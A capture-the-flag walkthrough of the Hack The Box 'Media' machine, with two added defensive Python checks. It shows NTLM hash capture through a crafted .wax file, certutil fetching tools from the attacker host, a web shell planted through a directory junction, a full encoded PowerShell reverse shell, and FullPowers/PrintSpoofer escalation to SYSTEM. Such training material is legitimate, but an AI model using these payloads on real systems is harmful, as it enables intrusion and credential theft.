You can solve this lab here: https://app.hackthebox.com/machines/Media
Network Enumeration
Target IP: 10.129.24.82 / 10.129.182.240
Attacker IP: 10.10.15.3
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-title: ProMotion Studio
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-09-10T14:21:14+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: MEDIA
| NetBIOS_Domain_Name: MEDIA
| NetBIOS_Computer_Name: MEDIA
| DNS_Domain_Name: MEDIA
| DNS_Computer_Name: MEDIA
| Product_Version: 10.0.20348
|_ System_Time: 2025-09-10T14:21:09+00:00
| ssl-cert: Subject: commonName=MEDIA
| Not valid before: 2025-04-15T03:36:52
|_Not valid after: 2025-10-15T03:36:52
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
At the bottom of the home page there is a form that lets us upload a file.
I submit a PNG file and the upload succeeds.
As the website states, whatever file we upload should be compatible with Windows Media Player.
NTLM hijacking via .wax
Doing some research on the exploits available for Windows Media Player, I come across this blog that showcases some ideas, and I highly recommend giving it a read: https://medium.com/@whickey000/creating-malicious-wms-files-malware-mondays-3-d4dbcb06a54f
We are going to use this tool to help us create our payload: https://github.com/Greenwolf/ntlm_theft.git
We generate the payloads with the tool's Python script:
python ntlm_theft.py --generate all --server 10.10.15.3 --filename video
The generated file we focus on is video.wax.
We make a few edits to the file so that, with Responder listening, we can capture the NTLM hash when the target opens it.
We start Responder and then upload the file:
sudo responder -I tun0
We get a hit on Responder with the hash.
We can use hashcat to recover the password from it:
hashcat hash /usr/share/wordlists/rockyou.txt.gz
1234virus@
We can SSH into the target using the recovered credentials:
enox:1234virus@
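As an added defensive example (not code from the original post or from ntlm_theft), the check below scans an uploaded .wax/.asx playlist for references that would make Windows Media Player connect to another host, which is what leaks the hash in the step above; the sample playlist is constructed, and the tag and scheme lists are assumptions.

```python
import re
from urllib.parse import urlparse

# ASX/WAX/WVX playlists are XML-like but tag and attribute names are
# case-insensitive and not always quoted, so a tolerant regex is used
# instead of a strict XML parser (assumed set of reference-bearing tags).
HREF_RE = re.compile(r"""<\s*(?:ref|base|entryref|param)\b[^>]*?\bhref\s*=\s*["']?([^"'>\s]+)""", re.I)
REMOTE_SCHEMES = {"http", "https", "mms", "mmsh", "mmst", "rtsp", "ftp"}


def classify_ref(href):
    """Return 'unc', 'remote', 'local' or 'unknown' for one playlist reference."""
    if href.startswith("\\\\") or href.startswith("//"):
        return "unc"                      # \\host\share\file: SMB auth to that host
    if href.lower().startswith("file:"):
        # file://host/share/file is a UNC path once the player resolves it
        netloc = urlparse(href).netloc
        return "unc" if netloc not in ("", "localhost") else "local"
    scheme = urlparse(href).scheme.lower()
    if scheme in REMOTE_SCHEMES:
        return "remote"
    if scheme == "" or (len(scheme) == 1 and scheme.isalpha()):
        return "local"                    # bare path or drive letter such as C:\...
    return "unknown"


def scan_playlist(text):
    """Return (href, verdict) for every reference that would make the player
    reach out to another host when the playlist is opened."""
    findings = []
    for href in HREF_RE.findall(text):
        verdict = classify_ref(href)
        if verdict != "local":
            findings.append((href, verdict))
    return findings


# Constructed sample in the shape of a .wax metafile: one entry points at an
# SMB share on another host, the other at a local file.
SAMPLE_WAX = """<ASX version="3.0">
  <TITLE>video</TITLE>
  <ENTRY><REF HREF="\\\\10.10.15.3\\share\\video.wmv"/></ENTRY>
  <ENTRY><REF HREF="C:\\Users\\Public\\Videos\\sample.wmv"/></ENTRY>
</ASX>
"""
```

Run scan_playlist over each uploaded playlist before it is queued for the player; a non-empty result is the upload to quarantine.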
Target machine enumeration
We set up a simple HTTP server on our attacking machine and transfer winPEASx64.exe onto the target for further enumeration:
python -m http.server
certutil -urlcache -f http://10.10.15.3:8000/winPEASx64.exe winPEASx64.exe
review.ps1 script
We find a file named review.ps1 in the Documents folder of user enox:
function Get-Values {
    param (
        [Parameter(Mandatory = $true)]
        [ValidateScript({Test-Path -Path $_ -PathType Leaf})]
        [string]$FilePath
    )
    # Read the first line of the file
    $firstLine = Get-Content $FilePath -TotalCount 1
    # Extract the values from the first line
    if ($firstLine -match 'Filename: (.+), Random Variable: (.+)') {
        $filename = $Matches[1]
        $randomVariable = $Matches[2]
        # Create a custom object with the extracted values
        $repoValues = [PSCustomObject]@{
            FileName = $filename
            RandomVariable = $randomVariable
        }
        # Return the custom object
        return $repoValues
    }
    else {
        # Return $null if the pattern is not found
        return $null
    }
}
function UpdateTodo {
    param (
        [Parameter(Mandatory = $true)]
        [ValidateScript({Test-Path -Path $_ -PathType Leaf})]
        [string]$FilePath
    )
    # Create a .NET stream reader and writer
    $reader = [System.IO.StreamReader]::new($FilePath)
    $writer = [System.IO.StreamWriter]::new($FilePath + ".tmp")
    # Read the first line and ignore it
    $reader.ReadLine() | Out-Null
    # Copy the remaining lines to a temporary file
    while (-not $reader.EndOfStream) {
        $line = $reader.ReadLine()
        $writer.WriteLine($line)
    }
    # Close the reader and writer
    $reader.Close()
    $writer.Close()
    # Replace the original file with the temporary file
    Remove-Item $FilePath
    Rename-Item -Path ($FilePath + ".tmp") -NewName $FilePath
}
$todofile="C:\\Windows\\Tasks\\Uploads\\todo.txt"
$mediaPlayerPath = "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
while($True){
    if ((Get-Content -Path $todofile) -eq $null) {
        Write-Host "Todo is empty."
        Sleep 60 # Sleep for 60 seconds before rechecking
    }
    else {
        # Take the first queued entry: the file name and its upload folder name
        $result = Get-Values -FilePath $todofile
        $filename = $result.FileName
        $randomVariable = $result.RandomVariable
        Write-Host "FileName: $filename"
        Write-Host "Random Variable: $randomVariable"
        # Opening the File in Windows Media Player (both values are used as-is)
        Start-Process -FilePath $mediaPlayerPath -ArgumentList "C:\Windows\Tasks\uploads\$randomVariable\$filename"
        # Wait for 15 seconds
        Start-Sleep -Seconds 15
        $mediaPlayerProcess = Get-Process -Name "wmplayer" -ErrorAction SilentlyContinue
        if ($mediaPlayerProcess -ne $null) {
            Write-Host "Killing Windows Media Player process."
            Stop-Process -Name "wmplayer" -Force
        }
        # Task Done
        UpdateTodo -FilePath $todofile # Updating C:\Windows\Tasks\Uploads\todo.txt
        Sleep 15
    }
}
This PowerShell script is a file-processing automation loop: it watches a todo list and opens each listed file in Windows Media Player. Here is what it does:
Core functionality
Main loop: the script runs continuously, checking the todo file every 60 seconds for new tasks to process.
File management:
- Monitors C:\Windows\Tasks\Uploads\todo.txt for entries
- Uses the Get-Values function to extract the file name and the directory name (Random Variable) from the first line of the todo file
- Removes the processed entry with the UpdateTodo function
Media Player integration:
- Opens the file in Windows Media Player using the path built from those two values: C:\Windows\Tasks\uploads\$randomVariable\$filename
- Waits 15 seconds, then forcefully terminates the wmplayer process
- Pauses another 15 seconds before checking for the next task
Critical security issues
Arbitrary file execution: the script opens any file path named in todo.txt through Windows Media Player. An attacker who can write to the todo file can make the player open malicious media files or trigger Media Player vulnerabilities.
Privileged file location: operating in C:\Windows\Tasks\ suggests the script runs with elevated privileges, which amplifies the impact of any weakness.
No input validation: neither the file path nor the content named in the todo file is validated, leaving the script open to:
- Path traversal (../ sequences)
- Execution of files from unexpected locations
- Processing of malicious or crafted media files
Uncontrolled file access: the script will try to open whatever is listed, regardless of file type, location, or safety.
Symlink abuse
We upload a PHP web shell (webshell.php) through the same form.
In C:\Windows\Tasks\Uploads we see the new folder created for our upload, containing webshell.php.
We remove that directory:
rmdir eabb9a81b36d60b97e74bae4a56f5e96
Then we set up the symbolic link (a directory junction) in its place:
cmd /c mklink /J C:\Windows\Tasks\Uploads\eabb9a81b36d60b97e74bae4a56f5e96 C:\xampp\htdocs
Command breakdown
cmd /c: runs the command in a new command prompt that closes after completion
mklink /J: creates a directory junction (a reparse point that redirects one local directory path to another)
Source: C:\Windows\Tasks\Uploads\eabb9a81b36d60b97e74bae4a56f5e96
Target: C:\xampp\htdocs
What this does
Creates a bridge: the junction makes the XAMPP web server's document root (C:\xampp\htdocs) reachable through the Windows Tasks directory under the hash-like folder name.
Directory aliasing: any file written to or read from C:\Windows\Tasks\Uploads\eabb9a81b36d60b97e74bae4a56f5e96\ is actually written to or read from C:\xampp\htdocs\
We upload the web shell once more so that it lands in the web root.
The symbolic link works: webshell.php is now in the root directory of the web site.
We now send a URL- and base64-encoded PowerShell reverse shell through the web shell to see if we get a connection back.
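As an added example (not code from the box or the original post), this validator shows the checks review.ps1 is missing before a todo.txt entry reaches Start-Process: the input validation discussed in the script analysis above and the junction trick from this section. A symlink on a constructed temp tree stands in for the mklink /J junction; the allowed-extension list and the 32-hex folder-name rule are assumptions.

```python
import os
import re
import tempfile

# Queue line format consumed by review.ps1 (same regex the script uses).
TODO_LINE = re.compile(r"^Filename: (.+), Random Variable: (.+)$")
# Upload folders on the box are 32 hex chars (eabb9a81...5e96); assumed rule.
RANDOM_VAR = re.compile(r"^[0-9a-f]{32}$")
# Container formats only; .wax/.asx/.wvx metafiles can reach other hosts (assumed).
ALLOWED_EXT = {".mp4", ".mp3", ".wmv", ".wma", ".avi"}


def validate_task(upload_root, line):
    """Return (reason, resolved_path); 'ok' only for a plain file name of an
    allowed type that stays inside upload_root once links are resolved."""
    m = TODO_LINE.match(line.strip())
    if not m:
        return "bad-format", None
    filename, rand = m.group(1), m.group(2)
    if not RANDOM_VAR.match(rand):
        return "bad-folder-name", None
    if "/" in filename or "\\" in filename or filename in ("", ".", ".."):
        return "traversal", None
    if os.path.splitext(filename)[1].lower() not in ALLOWED_EXT:
        return "disallowed-type", None
    root = os.path.realpath(upload_root)
    # realpath follows symlinks (and junctions on Windows), so a folder that
    # is really a link to C:\xampp\htdocs resolves outside root.
    candidate = os.path.realpath(os.path.join(root, rand, filename))
    if os.path.commonpath([root, candidate]) != root:
        return "outside-root", candidate
    return "ok", candidate


def demo():
    """Constructed upload tree: one honest folder plus one folder that is a
    symlink to an 'htdocs' directory, standing in for the mklink /J junction."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "Uploads")
    htdocs = os.path.join(base, "htdocs")
    os.makedirs(os.path.join(root, "a" * 32))
    os.makedirs(htdocs)
    os.symlink(htdocs, os.path.join(root, "b" * 32), target_is_directory=True)
    cases = {
        "clip": f"Filename: clip.mp4, Random Variable: {'a' * 32}",
        "wax": f"Filename: video.wax, Random Variable: {'a' * 32}",
        "dotdot": f"Filename: ../../x.mp4, Random Variable: {'a' * 32}",
        "folder": "Filename: x.mp4, Random Variable: ../../xampp/htdocs",
        "junction": f"Filename: webshell.mp4, Random Variable: {'b' * 32}",
    }
    return {name: validate_task(root, line)[0] for name, line in cases.items()}
```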
Generate easy reverse shells here: https://www.revshells.com/
curl http://10.129.182.240/webshell.php?cmd=powershell%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AMwAiACwAOQAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA%2BACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA%2BACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA%3D
We get a response back.
We check which privileges the LOCAL SERVICE account currently has enabled.
FullPowers
The LOCAL SERVICE account typically has these privileges by default:
SeChangeNotifyPrivilege (Bypass traverse checking)
SeCreateGlobalPrivilege (Create global objects)
SeImpersonatePrivilege (Impersonate a client after authentication)
SeIncreaseQuotaPrivilege (Adjust memory quotas for a process)
It is possible to restore these default privileges to our LOCAL SERVICE token.
We are going to use FullPowers to accomplish this:
https://github.com/itm4n/FullPowers/releases/tag/v0.1
We open a new listener on port 4444 and start a new session with a base64-encoded PowerShell payload:
.\FullPowers.exe -c "powershell -e <BASE64_ENCODED_POWERSHELL>" -z
We are now in as LOCAL SERVICE with its full default privilege set.
With SeImpersonatePrivilege back, we can abuse it to get SYSTEM-level access.
SYSTEM access
We will use PrintSpoofer to exploit SeImpersonatePrivilege found here: https://github.com/itm4n/PrintSpoofer
We transfer it onto the target machine and set up another listener, which we will use to connect as SYSTEM.
We get a hit back on our listener and have SYSTEM access! pwned